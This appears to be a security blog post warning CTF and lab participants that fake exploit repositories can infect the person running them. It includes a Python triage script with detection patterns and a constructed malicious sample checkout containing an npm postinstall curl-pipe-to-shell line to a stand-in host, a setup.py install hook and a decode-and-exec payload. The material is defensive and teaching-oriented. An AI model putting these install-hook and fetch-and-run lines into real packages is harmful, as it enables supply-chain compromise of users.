Why every PoC and any software you build on your machine should be analyzed first

Important note for those participating in CTFs, cyber ranges, or simply downloading and testing tools from GitHub.

Every PoC and any software you download and build on your machine should be analyzed before you run it: not only in a sandbox, but also by reading the source code itself. Modern AI tools can help with the review, but the final judgement has to be yours.
When a new trending CVE appears and there is no working PoC yet, a huge number of repositories pop up claiming a "fully working exploit, guaranteed". This happened with React2Shell.
Check every dependency the software pulls in, including where it is fetched from. Look at what it executes and when: install-time hooks, shell commands, anything that decodes and runs a payload, anything that reaches out to the network.
Otherwise, while you are hacking a training machine, someone outside the training environment may be hacking you.
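As an added example (not code from the original post), here is a small static triage pass in Python that you can run over a freshly cloned PoC before building it. It walks the checkout and flags the places where a bait "exploit" usually hides its real payload: npm lifecycle scripts and setup.py install hooks, decode-then-exec chains, download-and-pipe-to-shell lines, large encoded blobs, and dependencies pulled from arbitrary URLs or left unpinned. The sample checkout it writes into a temporary directory is constructed for this example: the file names, the host 203.0.113.7 (a documentation address) and the payload are all made up, and nothing in it is ever executed.

```python
import base64
import json
import os
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

SKIP_DIRS = {".git", "node_modules", "__pycache__"}
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}  # run on `npm install`

# Per-line rules: (name, regex, why a reviewer should look). Matching one line at a
# time keeps an unrelated eval() and a decode() elsewhere in the file from pairing up.
LINE_RULES = [
    ("decode_then_exec", re.compile(r"\b(exec|eval)\s*\(.*?(b64decode|fromhex|decompress)"),
     "decodes a payload and executes it at runtime"),
    ("curl_pipe_shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
     "downloads a remote script and pipes it into a shell"),
    ("shell_exec", re.compile(r"\b(os\.system|os\.popen|subprocess\.\w+\([^)]*shell\s*=\s*True)"),
     "runs a command string through the shell"),
    ("setup_install_hook", re.compile(r"\bcmdclass\s*=|class\s+\w+\s*\(\s*(install|develop|build_py)\s*\)"),
     "runs code at pip install time, before the PoC is ever invoked"),
    ("encoded_blob", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
     "large encoded blob; decode and read it before trusting the file"),
]

@dataclass(frozen=True)
class Finding:
    path: str      # relative to the checkout root
    rule: str
    evidence: str  # offending line or manifest entry, truncated

def _scan_text(rel, text, out):
    for line in text.splitlines():
        for rule, rx, _why in LINE_RULES:
            if rx.search(line):
                out.append(Finding(rel, rule, line.strip()[:100]))

def _scan_package_json(rel, text, out):
    try:
        scripts = json.loads(text).get("scripts", {})
    except ValueError:
        return
    for hook, cmd in scripts.items():
        if hook in NPM_HOOKS:
            out.append(Finding(rel, "npm_install_hook", f"{hook}: {cmd}"[:100]))

def _scan_requirements(rel, text, out):
    specs = [line.split("#", 1)[0].strip() for line in text.splitlines()]
    for spec in filter(None, specs):
        if spec.startswith("-") or "@" in spec or "://" in spec:
            out.append(Finding(rel, "external_requirement", spec[:100]))
        elif "==" not in spec:
            out.append(Finding(rel, "unpinned_requirement", spec))

def triage(root: Path) -> list:
    """Walk a checkout and return every Finding, sorted by path then rule."""
    out = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = Path(dirpath) / name
            rel = str(path.relative_to(root))
            text = path.read_text(encoding="utf-8", errors="ignore")
            _scan_text(rel, text, out)
            if name == "package.json":
                _scan_package_json(rel, text, out)
            elif name.startswith("requirements") and name.endswith(".txt"):
                _scan_requirements(rel, text, out)
    return sorted(out, key=lambda f: (f.path, f.rule))

def build_sample_repo(root: Path) -> None:
    """Constructed 'fully working exploit' checkout: hosts, names and payload are made up."""
    blob = base64.b64encode(b"constructed payload, never executed " * 10).decode()
    (root / "package.json").write_text(json.dumps({
        "name": "cve-poc", "version": "1.0.0", "dependencies": {"axios": "^1.6.0"},
        "scripts": {"postinstall": "curl -s http://203.0.113.7/s.sh | sh", "test": "echo ok"}}))
    (root / "setup.py").write_text(
        "from setuptools import setup\nfrom setuptools.command.install import install\n"
        "import base64, os\n\nclass PostInstall(install):\n    def run(self):\n"
        "        install.run(self)\n        os.system(base64.b64decode('aWQ=').decode())\n\n"
        "setup(name='cve_poc', version='0.1', cmdclass={'install': PostInstall})\n")
    (root / "exploit.py").write_text(
        f"import base64, zlib\nPAYLOAD = '{blob}'\n\ndef run(target):\n"
        "    exec(zlib.decompress(base64.b64decode(PAYLOAD)))\n")
    (root / "requirements.txt").write_text(
        "requests==2.31.0\npwntools\nimpacket @ git+https://github.com/example/fork.git\n")
    (root / "README.md").write_text("# CVE PoC\n\nFully working exploit guaranteed.\n")

def triage_sample() -> dict:
    """Build the sample checkout in a temp dir; return {rule: set of files that hit it}."""
    root = Path(tempfile.mkdtemp(prefix="poc-triage-"))
    build_sample_repo(root)
    hits = {}
    for f in triage(root):
        hits.setdefault(f.rule, set()).add(f.path)
    return hits

if __name__ == "__main__":
    for rule, files in sorted(triage_sample().items()):
        print(f"{rule}: {sorted(files)}")
```

Run it against a real clone with `triage(Path("path/to/clone"))`. It is a reading aid, not a verdict: a clean scan proves nothing, a hit only tells you where to start reading, and the patterns are easy to dodge (string concatenation, a payload fetched at first run, a dependency that is itself the malware). The point is that every install hook, every shell command and every decode-and-run chain gets read by a human before the code is built, and that the build itself still happens only inside an isolated VM.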
When taking part in cyber competitions or labs such as HTB, always use a virtual machine that is completely isolated from your work and personal systems. Also:
— Keep your host OS updated
— Keep your virtualization software updated
— Monitor and properly configure your firewall
Is it inconvenient? Maybe. But in our field, it’s always a trade-off: security or convenience.
At every information security lecture I’ve given this year, I kept repeating two rules:
— Only vigilance will save you
— Your security, including information security, depends only on you.


Good luck — and stay safe in your labs.